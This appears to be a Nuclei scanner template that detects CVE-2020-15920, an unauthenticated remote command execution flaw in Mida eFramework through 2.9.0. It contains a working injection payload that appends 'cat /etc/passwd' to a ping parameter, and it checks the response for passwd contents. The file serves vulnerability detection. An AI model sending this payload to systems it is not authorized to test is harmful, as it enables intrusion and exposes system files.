46 lines
1.6 KiB
YAML
46 lines
1.6 KiB
YAML
id: CVE-2020-15920
|
|
|
|
info:
|
|
name: Mida eFramework <=2.9.0 - Remote Command Execution
|
|
author: dwisiswant0
|
|
severity: critical
|
|
description: Mida eFramework through 2.9.0 allows an attacker to achieve remote code execution with administrative (root) privileges. No authentication is required.
|
|
remediation: |
|
|
Upgrade Mida eFramework to a version higher than 2.9.0 to mitigate the vulnerability.
|
|
reference:
|
|
- https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
|
|
- http://packetstormsecurity.com/files/158991/Mida-eFramework-2.9.0-Remote-Code-Execution.html
|
|
- http://packetstormsecurity.com/files/159194/Mida-Solutions-eFramework-ajaxreq.php-Command-Injection.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-15920
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2020-15920
|
|
cwe-id: CWE-78
|
|
epss-score: 0.97215
|
|
epss-percentile: 0.99787
|
|
cpe: cpe:2.3:a:midasolutions:eframework:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: midasolutions
|
|
product: eframework
|
|
tags: cve,cve2020,mida,rce,packetstorm
|
|
|
|
http:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100fefa3b865dee9c2cbf50a5b86b9f69ef7c31a97b3a4d77ca1b65253a41e1a4640221009cb686bd2952f72cfa1ea857cfdbc1df238f4f36c045cda2e8997fa9c96716af:922c64590222798bb761d5b6d8e72950
|